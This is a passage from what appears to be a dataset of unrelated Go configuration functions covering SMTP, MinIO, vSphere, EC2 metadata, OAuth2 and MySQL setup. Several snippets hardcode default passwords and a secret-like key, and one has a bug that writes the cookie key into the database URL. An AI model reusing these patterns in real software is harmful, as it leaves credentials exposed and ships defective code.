util.GetEnv(\"SERVER_SMTP_PASSWORD\", \"\"),\n\t\t\t\tAuthType: transport.SMTPAuthTypeFromString(util.GetEnv(\"SERVER_SMTP_AUTH_TYPE\", transport.SMTPAuthTypeNone.String())),\n\t\t\t\tUseTLS: util.GetEnvAsBool(\"SERVER_SMTP_USE_TLS\", false),\n\t\t\t\tTLSConfig: nil,\n\t\t\t},\n\t\t\tFrontend: FrontendServer{\n\t\t\t\tBaseURL: util.GetEnv(\"SERVER_FRONTEND_BASE_URL\", \"http://localhost:3000\"),\n\t\t\t\tPasswordResetEndpoint: util.GetEnv(\"SERVER_FRONTEND_PASSWORD_RESET_ENDPOINT\", \"/set-new-password\"),\n\t\t\t},\n\t\t\tLogger: LoggerServer{\n\t\t\t\tLevel: util.LogLevelFromString(util.GetEnv(\"SERVER_LOGGER_LEVEL\", zerolog.DebugLevel.String())),\n\t\t\t\tRequestLevel: util.LogLevelFromString(util.GetEnv(\"SERVER_LOGGER_REQUEST_LEVEL\", zerolog.DebugLevel.String())),\n\t\t\t\tLogRequestBody: util.GetEnvAsBool(\"SERVER_LOGGER_LOG_REQUEST_BODY\", false),\n\t\t\t\tLogRequestHeader: util.GetEnvAsBool(\"SERVER_LOGGER_LOG_REQUEST_HEADER\", false),\n\t\t\t\tLogRequestQuery: util.GetEnvAsBool(\"SERVER_LOGGER_LOG_REQUEST_QUERY\", false),\n\t\t\t\tLogResponseBody: util.GetEnvAsBool(\"SERVER_LOGGER_LOG_RESPONSE_BODY\", false),\n\t\t\t\tLogResponseHeader: util.GetEnvAsBool(\"SERVER_LOGGER_LOG_RESPONSE_HEADER\", false),\n\t\t\t\tPrettyPrintConsole: util.GetEnvAsBool(\"SERVER_LOGGER_PRETTY_PRINT_CONSOLE\", false),\n\t\t\t},\n\t\t\tPush: PushService{\n\t\t\t\tUseFCMProvider: util.GetEnvAsBool(\"SERVER_PUSH_USE_FCM\", false),\n\t\t\t\tUseMockProvider: util.GetEnvAsBool(\"SERVER_PUSH_USE_MOCK\", true),\n\t\t\t},\n\t\t\tFCMConfig: provider.FCMConfig{\n\t\t\t\tGoogleApplicationCredentials: util.GetEnv(\"GOOGLE_APPLICATION_CREDENTIALS\", \"\"),\n\t\t\t\tProjectID: util.GetEnv(\"SERVER_FCM_PROJECT_ID\", \"no-fcm-project-id-set\"),\n\t\t\t\tValidateOnly: util.GetEnvAsBool(\"SERVER_FCM_VALIDATE_ONLY\", true),\n\t\t\t},\n\t\t}\n\n\t})\n\n\treturn config\n}", "func newConfig(serviceName string) config {\n\t// Use stdlib to parse. If it's an invalid value and doesn't parse, log it\n\t// and keep going. It should already be false on error but we force it to\n\t// be extra clear that it's failing closed.\n\tinsecure, err := strconv.ParseBool(os.Getenv(\"OTEL_EXPORTER_OTLP_INSECURE\"))\n\tif err != nil {\n\t\tinsecure = false\n\t\tlog.Println(\"Invalid boolean value in OTEL_EXPORTER_OTLP_INSECURE. Try true or false.\")\n\t}\n\n\treturn config{\n\t\tservicename: serviceName,\n\t\tendpoint: os.Getenv(\"OTEL_EXPORTER_OTLP_ENDPOINT\"),\n\t\tinsecure: insecure,\n\t}\n}", "func NewConfig() AppConfig {\n\tappConfig := AppConfig{\n\t\tPort: \"1337\",\n\t}\n\n\tif port, isSet := os.LookupEnv(\"PORT\"); isSet {\n\t\tappConfig.Port = port\n\t}\n\n\treturn appConfig\n}", "func DefaultEnvConfig() (*Config, error) {\n\tif !env.OnGCE() {\n\t\treturn nil, nil\n\t}\n\tauth := \"none\"\n\tuser, _ := metadata.InstanceAttributeValue(\"camlistore-username\")\n\tpass, _ := metadata.InstanceAttributeValue(\"camlistore-password\")\n\tconfBucket, err := metadata.InstanceAttributeValue(\"camlistore-config-dir\")\n\tif confBucket == \"\" || err != nil {\n\t\treturn nil, fmt.Errorf(\"VM instance metadata key 'camlistore-config-dir' not set: %v\", err)\n\t}\n\tblobBucket, err := metadata.InstanceAttributeValue(\"camlistore-blob-dir\")\n\tif blobBucket == \"\" || err != nil {\n\t\treturn nil, fmt.Errorf(\"VM instance metadata key 'camlistore-blob-dir' not set: %v\", err)\n\t}\n\tif user != \"\" && pass != \"\" {\n\t\tauth = \"userpass:\" + user + \":\" + pass\n\t}\n\n\tif v := osutil.SecretRingFile(); !strings.HasPrefix(v, \"/gcs/\") {\n\t\treturn nil, fmt.Errorf(\"Internal error: secret ring path on GCE should be at /gcs/, not %q\", v)\n\t}\n\tkeyID, secRing, err := getOrMakeKeyring()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\thighConf := &serverconfig.Config{\n\t\tAuth: auth,\n\t\tHTTPS: true,\n\t\tIdentity: keyID,\n\t\tIdentitySecretRing: secRing,\n\t\tGoogleCloudStorage: \":\" + strings.TrimPrefix(blobBucket, \"gs://\"),\n\t\tPackRelated: true,\n\t\tShareHandler: true,\n\t}\n\n\texternalIP, _ := metadata.ExternalIP()\n\thostName, _ := metadata.InstanceAttributeValue(\"camlistore-hostname\")\n\t// If they specified a hostname (probably with pk-deploy), then:\n\t// if it looks like an FQDN, perkeepd is going to rely on Let's\n\t// Encrypt, else perkeepd is going to generate some self-signed for that\n\t// hostname.\n\t// Also, if the hostname is in camlistore.net, we want Perkeep to initialize\n\t// exactly as if the instance had no hostname, so that it registers its hostname/IP\n\t// with the camlistore.net DNS server (possibly needlessly, if the instance IP has\n\t// not changed) again.\n\tif hostName != \"\" && !strings.HasSuffix(hostName, CamliNetDomain) {\n\t\thighConf.BaseURL = fmt.Sprintf(\"https://%s\", hostName)\n\t\thighConf.Listen = \"0.0.0.0:443\"\n\t} else {\n\t\thighConf.CamliNetIP = externalIP\n\t}\n\n\t// Detect a linked Docker MySQL container. It must have alias \"mysqldb\".\n\tmysqlPort := os.Getenv(\"MYSQLDB_PORT\")\n\tif !strings.HasPrefix(mysqlPort, \"tcp://\") {\n\t\t// No MySQL\n\t\t// TODO: also detect Cloud SQL.\n\t\thighConf.KVFile = \"/index.kv\"\n\t\treturn genLowLevelConfig(highConf)\n\t}\n\thostPort := strings.TrimPrefix(mysqlPort, \"tcp://\")\n\thighConf.MySQL = \"root@\" + hostPort + \":\" // no password\n\tconfigVersion, err := metadata.InstanceAttributeValue(\"perkeep-config-version\")\n\tif configVersion == \"\" || err != nil {\n\t\t// the launcher is deploying a pre-\"perkeep-config-version\" Perkeep, which means\n\t\t// we want the old configuration, with DBNames\n\t\thighConf.DBUnique = useDBNamesConfig\n\t} else if configVersion != \"1\" {\n\t\treturn nil, fmt.Errorf(\"unexpected value for VM instance metadata key 'perkeep-config-version': %q\", configVersion)\n\t}\n\n\tconf, err := genLowLevelConfig(highConf)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif err := conf.readFields(); err != nil {\n\t\treturn nil, err\n\t}\n\treturn conf, nil\n}", "func newConfigV101() *configV1 {\n\tconf := new(configV1)\n\tconf.Version = mcCurrentConfigVersion\n\t// make sure to allocate map's otherwise Golang\n\t// exits silently without providing any errors\n\tconf.Hosts = make(map[string]*hostConfig)\n\tconf.Aliases = make(map[string]string)\n\n\tlocalHostConfig := new(hostConfig)\n\tlocalHostConfig.AccessKeyID = \"\"\n\tlocalHostConfig.SecretAccessKey = \"\"\n\n\ts3HostConf := new(hostConfig)\n\ts3HostConf.AccessKeyID = globalAccessKeyID\n\ts3HostConf.SecretAccessKey = globalSecretAccessKey\n\n\t// Your example host config\n\texampleHostConf := new(hostConfig)\n\texampleHostConf.AccessKeyID = globalAccessKeyID\n\texampleHostConf.SecretAccessKey = globalSecretAccessKey\n\n\tplayHostConfig := new(hostConfig)\n\tplayHostConfig.AccessKeyID = \"\"\n\tplayHostConfig.SecretAccessKey = \"\"\n\n\tdlHostConfig := new(hostConfig)\n\tdlHostConfig.AccessKeyID = \"\"\n\tdlHostConfig.SecretAccessKey = \"\"\n\n\tconf.Hosts[exampleHostURL] = exampleHostConf\n\tconf.Hosts[\"localhost:*\"] = localHostConfig\n\tconf.Hosts[\"127.0.0.1:*\"] = localHostConfig\n\tconf.Hosts[\"s3*.amazonaws.com\"] = s3HostConf\n\tconf.Hosts[\"play.minio.io:9000\"] = playHostConfig\n\tconf.Hosts[\"dl.minio.io:9000\"] = dlHostConfig\n\n\taliases := make(map[string]string)\n\taliases[\"s3\"] = \"https://s3.amazonaws.com\"\n\taliases[\"play\"] = \"https://play.minio.io:9000\"\n\taliases[\"dl\"] = \"https://dl.minio.io:9000\"\n\taliases[\"localhost\"] = \"http://localhost:9000\"\n\tconf.Aliases = aliases\n\n\treturn conf\n}", "func NewConfig() *Config {\n\treturn &Config{\n\t\tHosts: []string{\"localhost:10101\"},\n\t\tGenerate: true,\n\t\tVerify: \"update\",\n\t\tPrefix: \"imaginary-\",\n\t\tThreadCount: 0, // if unchanged, uses workloadspec.threadcount\n\t\t// if workloadspec.threadcount is also unset, defaults to 1\n\t}\n}", "func (s *Server) initConfig() (err error) {\n\t// Home directory is current working directory by default\n\tif s.HomeDir == \"\" {\n\t\ts.HomeDir, err = os.Getwd()\n\t\tif err != nil {\n\t\t\treturn errors.Wrap(err, \"Failed to get server's home directory\")\n\t\t}\n\t}\n\t// Make home directory absolute, if not already\n\tabsoluteHomeDir, err := filepath.Abs(s.HomeDir)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"Failed to make server's home directory path absolute: %s\", err)\n\t}\n\ts.HomeDir = absoluteHomeDir\n\t// Create config if not set\n\tif s.Config == nil {\n\t\ts.Config = new(ServerConfig)\n\t}\n\ts.CA.server = s\n\ts.CA.HomeDir = s.HomeDir\n\terr = s.initMultiCAConfig()\n\tif err != nil {\n\t\treturn err\n\t}\n\trevoke.SetCRLFetcher(s.fetchCRL)\n\t// Make file names absolute\n\ts.makeFileNamesAbsolute()\n\n\tcompModeStr := os.Getenv(\"FABRIC_CA_SERVER_COMPATIBILITY_MODE_V1_3\")\n\tif compModeStr == \"\" {\n\t\tcompModeStr = \"true\" // TODO: Change default to false once all clients have been updated to use the new authorization header\n\t}\n\n\ts.Config.CompMode1_3, err = strconv.ParseBool(compModeStr)\n\tif err != nil {\n\t\treturn errors.WithMessage(err, \"Invalid value for boolean environment variable 'FABRIC_CA_SERVER_COMPATIBILITY_MODE_V1_3'\")\n\t}\n\n\treturn nil\n}", "func newConfig(initiator bool) noise.Config {\n\treturn noise.Config{\n\t\tCipherSuite: cipherSuite,\n\t\tPattern: noise.HandshakeNK,\n\t\tInitiator: initiator,\n\t\tPrologue: []byte(\"dnstt 2020-04-13\"),\n\t}\n}", "func (c *config) newConfig(redirect string) *oauth2.Config {\n\treturn &oauth2.Config{\n\t\tClientID: c.Client,\n\t\tClientSecret: c.Secret,\n\t\tEndpoint: oauth2.Endpoint{\n\t\t\tAuthURL: fmt.Sprintf(\"%s/site/oauth2/authorize\", c.URL),\n\t\t\tTokenURL: fmt.Sprintf(\"%s/site/oauth2/access_token\", c.URL),\n\t\t},\n\t\tRedirectURL: fmt.Sprintf(\"%s/authorize\", redirect),\n\t}\n}", "func NewConfig() *Config {\n\treturn &Config{\n\t\tPort: \"2000\",\n\t\tDomain: \".dev\",\n\t\tURLPattern: `.*\\.dev$`,\n\t\tServices: nil,\n\t}\n}", "func (env *Dsn) newMySQLConfig() (*mysql.Config, error) {\n\tvar err error\n\tdsn := mysql.NewConfig()\n\n\tdsn.User = env.User\n\tdsn.Passwd = env.Password\n\tdsn.Net = env.Net\n\tdsn.Addr = env.Addr\n\tdsn.DBName = env.Schema\n\tdsn.Params = make(map[string]string)\n\tfor k, v := range env.Params {\n\t\tdsn.Params[k] = v\n\t}\n\tdsn.Params[\"charset\"] = env.Charset\n\tdsn.Collation = env.Collation\n\tdsn.Loc, err = time.LoadLocation(env.Loc)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdsn.MaxAllowedPacket = env.MaxAllowedPacket\n\tdsn.ServerPubKey = env.ServerPubKey\n\tdsn.TLSConfig = env.TLS\n\tif env.Timeout != \"\" {\n\t\tdsn.Timeout, err = time.ParseDuration(env.Timeout)\n\t\tLogIfError(err, \"timeout: '%s'\", env.Timeout)\n\t}\n\tif env.WriteTimeout != \"\" {\n\t\tdsn.WriteTimeout, err = time.ParseDuration(env.WriteTimeout)\n\t\tLogIfError(err, \"writeTimeout: '%s'\", env.WriteTimeout)\n\t}\n\tif env.ReadTimeout != \"\" {\n\t\tdsn.ReadTimeout, err = time.ParseDuration(env.ReadTimeout)\n\t\tLogIfError(err, \"readTimeout: '%s'\", env.ReadTimeout)\n\t}\n\tdsn.AllowNativePasswords = env.AllowNativePasswords\n\tdsn.AllowOldPasswords = env.AllowOldPasswords\n\treturn dsn, err\n}", "func initConfig() {\n\tcfg = config.NewConfig()\n\t// server info\n\tflag.StringVar(&cfg.ServerInfo.Ip, \"ip\", \"0.0.0.0\", \"ip address to listen\")\n\tflag.UintVar(&cfg.ServerInfo.ListenPort, \"listen_port\", 8888, \"listen port\")\n\tflag.UintVar(&cfg.ServerInfo.ManagePort, \"manage_port\", 9999, \"manage port\")\n\n\t// db info\n\tflag.StringVar(&cfg.DbInfo.DbIp, \"db_ip\", \"0.0.0.0\", \"db ip\")\n\tflag.UintVar(&cfg.DbInfo.DbPort, \"db_port\", 6033, \"db port\")\n\tflag.StringVar(&cfg.DbInfo.DbUser, \"db_user\", \"root\", \"db user\")\n\tflag.StringVar(&cfg.DbInfo.DbPassword, \"db_password\", \"root-root\", \"db password\")\n\tflag.StringVar(&cfg.DbInfo.DbName, \"db_name\", \"lottery\", \"db name\")\n\n\t// redis info\n\tflag.StringVar(&cfg.RedisInfo.RedisIp, \"redis_ip\", \"10.23.101.22\", \"redis ip\")\n\tflag.UintVar(&cfg.RedisInfo.RedisPort, \"redis_port\", 6379, \"redis port\")\n\tflag.StringVar(&cfg.RedisInfo.RedisUser, \"redis_user\", \"root\", \"redis user\")\n\tflag.StringVar(&cfg.RedisInfo.RedisPassword, \"redis_password\", \"root-root\", \"redis password\")\n\n\t// parse\n\tflag.Parse()\n}", "func newConfig() (*config, error) {\n\tec2Metadata := ec2metadata.New(session.Must(session.NewSession()))\n\tregion, err := ec2Metadata.Region()\n\tif err != nil {\n\t\treturn nil, errors.Wrapf(err, \"unable to get region from ec2 metadata\")\n\t}\n\n\tinstanceID, err := ec2Metadata.GetMetadata(\"instance-id\")\n\tif err != nil {\n\t\treturn nil, errors.Wrapf(err, \"unable to get instance id from ec2 metadata\")\n\t}\n\n\tmac, err := ec2Metadata.GetMetadata(\"mac\")\n\tif err != nil {\n\t\treturn nil, errors.Wrapf(err, \"unable to get mac from ec2 metadata\")\n\t}\n\n\tsecurityGroups, err := ec2Metadata.GetMetadata(\"security-groups\")\n\tif err != nil {\n\t\treturn nil, errors.Wrapf(err, \"unable to get security groups from ec2 metadata\")\n\t}\n\n\tinterfaces, err := ec2Metadata.GetMetadata(\"network/interfaces/macs\")\n\tif err != nil {\n\t\treturn nil, errors.Wrapf(err, \"unable to get interfaces from ec2 metadata\")\n\t}\n\n\tsubnet, err := ec2Metadata.GetMetadata(\"network/interfaces/macs/\" + mac + \"/subnet-id\")\n\tif err != nil {\n\t\treturn nil, errors.Wrapf(err, \"unable to get subnet from ec2 metadata\")\n\t}\n\n\tvpc, err := ec2Metadata.GetMetadata(\"network/interfaces/macs/\" + mac + \"/vpc-id\")\n\tif err != nil {\n\t\treturn nil, errors.Wrapf(err, \"unable to get vpc from ec2 metadata\")\n\t}\n\n\treturn &config{region: region,\n\t\tsubnet: subnet,\n\t\tindex: int64(len(strings.Split(interfaces, \"\\n\"))),\n\t\tinstanceID: instanceID,\n\t\tsecurityGroups: strings.Split(securityGroups, \"\\n\"),\n\t\tvpc: vpc,\n\t}, nil\n}", "func New(config *interface{}) {\n\tv := reflect.ValueOf(*config)\n\tfieldCount := v.NumField()\n\n\tfor i := 0; i < fieldCount; i++ {\n\t\tswitch v.Field(i).Kind() {\n\t\tcase reflect.Int:\n\t\t\tval := reflect.ValueOf(getIntFromEnv(v.Field(i).Type().Name()))\n\t\t\tv.Field(i).Set(val)\n\t\tcase reflect.String:\n\t\t\tval := reflect.ValueOf(getStringFromEnv(v.Field(i).Type().Name()))\n\t\t\tv.Field(i).Set(val)\n\t\tcase reflect.Bool:\n\t\t\tval := reflect.ValueOf(getBoolFromEnv(v.Field(i).Type().Name()))\n\t\t\tv.Field(i).Set(val)\n\t\tdefault:\n\t\t\tlog.Fatalf(\"error building config -- %s is not of an acceptable type\", v.Field(i).Type().Name())\n\t\t}\n\t}\n}", "func NewConfig() *Config {\n\tvar c Config\n\tc.Port = os.Getenv(\"PORT\")\n\tif c.Port == \"\" {\n\t\tc.Port = \":8000\"\n\t}\n\tc.LogLevel = os.Getenv(\"LogLevel\")\n\tif c.LogLevel == \"\" {\n\t\tc.LogLevel = \"debug\"\n\t}\n\tc.DatabaseURL = os.Getenv(\"DATABASE_URL\")\n\tif c.DatabaseURL == \"\" {\n\t\tc.DatabaseURL = \"host=localhost user=postgres dbname=rest_api sslmode=disable password=4256\"\n\t}\n\tc.CookieKey = os.Getenv(\"CookieKey\")\n\tif c.DatabaseURL == \"\" {\n\t\tc.DatabaseURL = \"xWly5GVFkNc2suGAUfrEEm1gUyya0gJ8Zjebmj0OZklS7rNfAQAO03DMontDwSfqpjeHx6rZL5UZR9XXtB39yDLIGITcu6cQ92Zs\"\n\t}\n\treturn &c\n}", "func initConfig() {\n\t// if cfgFile != \"\" {\n\t// \t// Use config file from the flag.\n\t// \tviper.SetConfigFile(cfgFile)\n\t// } else {\n\t// \t// Find home directory.\n\t// \thome, err := homedir.Dir()\n\t// \tif err != nil {\n\t// \t\tfmt.Println(err)\n\t// \t\tos.Exit(1)\n\t// \t}\n\n\t// \t// Search config in home directory with name \".newApp\" (without extension).\n\t// \tviper.AddConfigPath(home)\n\t// \tviper.SetConfigName(\".newApp\")\n\t// }\n\n\t// viper.AutomaticEnv() // read in environment variables that match\n\n\t// // If a config file is found, read it in.\n\t// if err := viper.ReadInConfig(); err == nil {\n\t// \tfmt.Println(\"Using config file:\", viper.ConfigFileUsed())\n\t// }\n}", "func initConfig() {\n\tif RootConfig.clusterID == \"\" {\n\t\tlog.Fatal(\"A cluster id must be provided.\")\n\t}\n\tif RootConfig.internal {\n\t\tRootConfig.config = insideCluster()\n\t} else {\n\t\tRootConfig.config = outsideCluster()\n\t}\n}", "func initConfig() {\n\tviper.SetDefault(\"metadata\", \"datamon-meta-data\")\n\tviper.SetDefault(\"blob\", \"datamon-blob-data\")\n\tviper.SetDefault(\"label\", \"datamon-label-data\")\n\tif os.Getenv(\"DATAMON_CONFIG\") != \"\" {\n\t\t// Use config file from the flag.\n\t\tviper.SetConfigFile(os.Getenv(\"DATAMON_CONFIG\"))\n\t} else {\n\t\tviper.AddConfigPath(\".\")\n\t\tviper.AddConfigPath(\"$HOME/.datamon\")\n\t\tviper.AddConfigPath(\"/etc/datamon\")\n\t\tviper.SetConfigName(\"datamon\")\n\t}\n\n\tviper.AutomaticEnv() // read in environment variables that match\n\t// If a config file is found, read it in.\n\tviper.ReadInConfig() // nolint:errcheck\n\t// `viper.ConfigFileUsed()` returns path to config file if error is nil\n\tvar err error\n\tconfig, err = newConfig()\n\tif err != nil {\n\t\tlogFatalln(err)\n\t}\n\tconfig.setRepoParams(&params)\n\tif config.Credential != \"\" {\n\t\t// Always pick the config file. There can be a duplicate bucket name in a different project, avoid wrong environment\n\t\t// variable from dev testing from screwing things up..\n\t\t_ = os.Setenv(\"GOOGLE_APPLICATION_CREDENTIALS\", config.Credential)\n\t}\n}", "func NewConfig() {\n\t appConfig = &AppConfig{}\n}", "func initConfig(cmd *cobra.Command) {\n\tviper.SetConfigName(\".skelly\") // name of config file (without extension)\n\tviper.AddConfigPath(\"$HOME\") // adding home directory as first search path\n\tviper.SetConfigType(\"json\")\n\tviper.AutomaticEnv() // read in environment variables that match\n\n\tfmt.Println(\"got here\")\n\t// If a config file is found, read it in.\n\tif err := viper.ReadInConfig(); err == nil {\n\t\tfmt.Println(\"Using config file:\", viper.ConfigFileUsed())\n\t}\n\n\t// Make sure that go src var is set\n\tgopath = viper.GetString(\"gopath\")\n\tif len(gopath) <= 0 {\n\t\tgopath = joinPath(os.Getenv(\"GOPATH\"), \"src\")\n\t\tviper.Set(\"gopath\", gopath)\n\t}\n\n\tif cmd.Flags().Lookup(\"project-root\").Changed {\n\t\tviper.Set(\"project-root\", basePath)\n\t}\n\tif cmd.Flags().Lookup(\"author\").Changed {\n\t\tfmt.Println(\"adding author\")\n\t\tviper.Set(\"author\", author)\n\t}\n\tif cmd.Flags().Lookup(\"email\").Changed {\n\t\tviper.Set(\"email\", email)\n\t}\n\tfmt.Println(email)\n\tif cmd.Flags().Lookup(\"license\").Changed {\n\t\tviper.Set(\"license\", license)\n\t}\n}", "func NewConfig(base string) (config *Config) {\n\tconfig = &Config{}\n\tconfig.Base = base\n\tconfig.Entries = make(map[string]ConfigEntry)\n\treturn\n}", "func serverConfig() (http.ServerConfig, error) {\n\tconfig := http.ServerConfig{}\n\tvar err error\n\tconfig.Port, err = os.GetIntFromEnvVar(\"PORT\", 8080)\n\tif err != nil {\n\t\treturn config, err\n\t}\n\tconfig.TLSEnabled, err = os.GetBoolFromEnvVar(\"TLS_ENABLED\", false)\n\tif err != nil {\n\t\treturn config, err\n\t}\n\tif config.TLSEnabled {\n\t\tconfig.TLSCertPath, err = os.GetRequiredEnvVar(\"TLS_CERT_PATH\")\n\t\tif err != nil {\n\t\t\treturn config, err\n\t\t}\n\t\tconfig.TLSKeyPath, err = os.GetRequiredEnvVar(\"TLS_KEY_PATH\")\n\t\tif err != nil {\n\t\t\treturn config, err\n\t\t}\n\t}\n\treturn config, nil\n}", "func NewConfig(args []string) (*Config, error) {\n\tconfig := &Config{}\n\tif len(args) == 0 {\n\t\treturn config, errors.New(\"arguments cannot be empty\")\n\t}\n\n\t// load default config values\n\tconfig.FlagPort = defaultHTTPPort\n\tconfig.FlagGetRequestTimeout = defaultGETRequestTimeout\n\n\tflagSet := flag.NewFlagSet(dcosLog, flag.ContinueOnError)\n\tconfig.setFlags(flagSet)\n\n\t// override with user provided arguments\n\tif err := flagSet.Parse(args[1:]); err != nil {\n\t\treturn config, err\n\t}\n\n\t// read config file if exists.\n\tif err := readAndUpdateConfigFile(config); err != nil {\n\t\treturn nil, err\n\t}\n\n\t// set debug level\n\tif config.FlagVerbose {\n\t\tlogrus.SetLevel(logrus.DebugLevel)\n\t\tlogrus.Debug(\"Using debug level\")\n\t}\n\n\treturn config, validateConfigStruct(config)\n}", "func initConfig(secret map[string]string) *Config {\n\tc := Config{\n\t\tmember: viper.New(),\n\t\tsecretValues: secret,\n\t}\n\tc.member.SetEnvPrefix(MemberEnvPrefix)\n\tc.member.AutomaticEnv()\n\tc.member.SetEnvKeyReplacer(strings.NewReplacer(\".\", \"_\"))\n\tc.setConfigDefaults()\n\treturn &c\n}", "func NewConfig(configFile string) (*Config, error) {\n\n\tcfg := &Config{\n\t\tHost: \"0.0.0.0\",\n\t\tPort: 8080,\n\t\tAllowEmptyClientSecret: false,\n\t\tScopes: []string{\"openid\", \"profile\", \"email\", \"offline_access\"},\n\t\tUsernameClaim: \"nickname\",\n\t\tEmailClaim: \"\",\n\t\tServeTLS: false,\n\t\tCertFile: \"/etc/gangway/tls/tls.crt\",\n\t\tKeyFile: \"/etc/gangway/tls/tls.key\",\n\t\tClusterCAPath: \"/var/run/secrets/kubernetes.io/serviceaccount/ca.crt\",\n\t\tHTTPPath: \"\",\n\t}\n\n\tif configFile != \"\" {\n\t\tdata, err := ioutil.ReadFile(configFile)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\terr = yaml.Unmarshal([]byte(data), cfg)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\terr := envconfig.Process(\"gangway\", cfg)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\terr = cfg.Validate()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// Check for trailing slash on HTTPPath and remove\n\tcfg.HTTPPath = strings.TrimRight(cfg.HTTPPath, \"/\")\n\n\treturn cfg, nil\n}", "func NewConfig() *Config {\n\treturn &Config{\n\t\tGatewayIP: env(\"SCALEIO_GATEWAY_IP\", \"127.0.0.1\"),\n\t\tUsername: env(\"SCALEIO_GATEWAY_USERNAME\", \"admin\"),\n\t\tPassword: env(\"SCALEIO_GATEWAY_PASSWORD\", \"admin\"),\n\t\tVersion: env(\"SCALEIO_GATEWAY_VERSION\", \"2.0\"),\n\t\tSdsList: env(\"SCALEIO_SDS_LIST\", \"\"),\n\t}\n}", "func (cfg *Config) FromEnv() error {\n\n\t//Init\n\tif cfg.VirtualCenter == nil {\n\t\tcfg.VirtualCenter = make(map[string]*VirtualCenterConfig)\n\t}\n\n\t//Globals\n\tif v := os.Getenv(\"VSPHERE_VCENTER\"); v != \"\" {\n\t\tcfg.Global.VCenterIP = v\n\t}\n\tif v := os.Getenv(\"VSPHERE_VCENTER_PORT\"); v != \"\" {\n\t\tcfg.Global.VCenterPort = v\n\t}\n\tif v := os.Getenv(\"VSPHERE_USER\"); v != \"\" {\n\t\tcfg.Global.User = v\n\t}\n\tif v := os.Getenv(\"VSPHERE_PASSWORD\"); v != \"\" {\n\t\tcfg.Global.Password = v\n\t}\n\tif v := os.Getenv(\"VSPHERE_DATACENTER\"); v != \"\" {\n\t\tcfg.Global.Datacenters = v\n\t}\n\tif v := os.Getenv(\"VSPHERE_SECRET_NAME\"); v != \"\" {\n\t\tcfg.Global.SecretName = v\n\t}\n\tif v := os.Getenv(\"VSPHERE_SECRET_NAMESPACE\"); v != \"\" {\n\t\tcfg.Global.SecretNamespace = v\n\t}\n\n\tif v := os.Getenv(\"VSPHERE_ROUNDTRIP_COUNT\"); v != \"\" {\n\t\ttmp, err := strconv.ParseUint(v, 10, 32)\n\t\tif err != nil {\n\t\t\tklog.Errorf(\"Failed to parse VSPHERE_ROUNDTRIP_COUNT: %s\", err)\n\t\t} else {\n\t\t\tcfg.Global.RoundTripperCount = uint(tmp)\n\t\t}\n\t}\n\n\tif v := os.Getenv(\"VSPHERE_INSECURE\"); v != \"\" {\n\t\tInsecureFlag, err := strconv.ParseBool(v)\n\t\tif err != nil {\n\t\t\tklog.Errorf(\"Failed to parse VSPHERE_INSECURE: %s\", err)\n\t\t} else {\n\t\t\tcfg.Global.InsecureFlag = InsecureFlag\n\t\t}\n\t}\n\n\tif v := os.Getenv(\"VSPHERE_API_DISABLE\"); v != \"\" {\n\t\tAPIDisable, err := strconv.ParseBool(v)\n\t\tif err != nil {\n\t\t\tklog.Errorf(\"Failed to parse VSPHERE_API_DISABLE: %s\", err)\n\t\t} else {\n\t\t\tcfg.Global.APIDisable = APIDisable\n\t\t}\n\t}\n\n\tif v := os.Getenv(\"VSPHERE_API_BINDING\"); v != \"\" {\n\t\tcfg.Global.APIBinding = v\n\t}\n\n\tif v := os.Getenv(\"VSPHERE_SECRETS_DIRECTORY\"); v != \"\" {\n\t\tcfg.Global.SecretsDirectory = v\n\t}\n\tif cfg.Global.SecretsDirectory == \"\" {\n\t\tcfg.Global.SecretsDirectory = DefaultSecretDirectory\n\t}\n\tif _, err := os.Stat(cfg.Global.SecretsDirectory); os.IsNotExist(err) {\n\t\tcfg.Global.SecretsDirectory = \"\" //Dir does not exist, set to empty string\n\t}\n\n\tif v := os.Getenv(\"VSPHERE_CAFILE\"); v != \"\" {\n\t\tcfg.Global.CAFile = v\n\t}\n\tif v := os.Getenv(\"VSPHERE_THUMBPRINT\"); v != \"\" {\n\t\tcfg.Global.Thumbprint = v\n\t}\n\tif v := os.Getenv(\"VSPHERE_LABEL_REGION\"); v != \"\" {\n\t\tcfg.Labels.Region = v\n\t}\n\tif v := os.Getenv(\"VSPHERE_LABEL_ZONE\"); v != \"\" {\n\t\tcfg.Labels.Zone = v\n\t}\n\n\t//Build VirtualCenter from ENVs\n\tfor _, e := range os.Environ() {\n\t\tpair := strings.Split(e, \"=\")\n\n\t\tif len(pair) != 2 {\n\t\t\tcontinue\n\t\t}\n\n\t\tkey := pair[0]\n\t\tvalue := pair[1]\n\n\t\tif strings.HasPrefix(key, \"VSPHERE_VCENTER_\") && len(value) > 0 {\n\t\t\tid := strings.TrimPrefix(key, \"VSPHERE_VCENTER_\")\n\t\t\tvcenter := value\n\n\t\t\t_, username, errUsername := getEnvKeyValue(\"VCENTER_\"+id+\"_USERNAME\", false)\n\t\t\tif errUsername != nil {\n\t\t\t\tusername = cfg.Global.User\n\t\t\t}\n\t\t\t_, password, errPassword := getEnvKeyValue(\"VCENTER_\"+id+\"_PASSWORD\", false)\n\t\t\tif errPassword != nil {\n\t\t\t\tpassword = cfg.Global.Password\n\t\t\t}\n\t\t\t_, server, errServer := getEnvKeyValue(\"VCENTER_\"+id+\"_SERVER\", false)\n\t\t\tif errServer != nil {\n\t\t\t\tserver = \"\"\n\t\t\t}\n\t\t\t_, port, errPort := getEnvKeyValue(\"VCENTER_\"+id+\"_PORT\", false)\n\t\t\tif errPort != nil {\n\t\t\t\tport = cfg.Global.VCenterPort\n\t\t\t}\n\t\t\tinsecureFlag := false\n\t\t\t_, insecureTmp, errInsecure := getEnvKeyValue(\"VCENTER_\"+id+\"_INSECURE\", false)\n\t\t\tif errInsecure != nil {\n\t\t\t\tinsecureFlagTmp, errTmp := strconv.ParseBool(insecureTmp)\n\t\t\t\tif errTmp == nil {\n\t\t\t\t\tinsecureFlag = insecureFlagTmp\n\t\t\t\t}\n\t\t\t}\n\t\t\t_, datacenters, errDatacenters := getEnvKeyValue(\"VCENTER_\"+id+\"_DATACENTERS\", false)\n\t\t\tif errDatacenters != nil {\n\t\t\t\tdatacenters = 